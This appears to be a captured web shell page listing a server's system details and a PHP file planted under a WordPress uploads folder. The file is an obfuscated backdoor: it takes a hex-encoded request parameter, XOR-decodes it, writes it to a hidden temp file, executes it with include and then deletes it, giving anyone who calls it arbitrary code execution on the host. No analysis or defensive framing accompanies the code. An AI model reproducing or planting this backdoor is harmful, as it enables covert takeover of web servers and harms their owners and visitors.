HEX
Server: Apache
System: Linux p3plzcpnl505958.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: ykk9qst4f1zf (7936182)
PHP: 8.3.25
Disabled: NONE
Upload Files
File: /home/ykk9qst4f1zf/public_html/wp-content/uploads/custom-file-3-1758445689.php
<!--gXfDNwRw-->
<?php

if(!empty($_REQUEST["en\x74"])){
$bind = hex2bin($_REQUEST["en\x74"]);
$mrk   =   ''    ;      $g=0;do{$mrk.=chr(ord($bind[$g])^78);$g++;}while($g<strlen($bind));
$comp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
foreach ($comp as $key => $flg) {
            if (array_product([is_dir($flg), is_writable($flg)])) {
            $ptr = "$flg" . "/.pset";
            if ($itm = fopen($ptr, 'w')) {
    fwrite($itm, $mrk);
    fclose($itm);
    include_once $ptr;
    unlink($ptr);
    die();
}
        }
}
}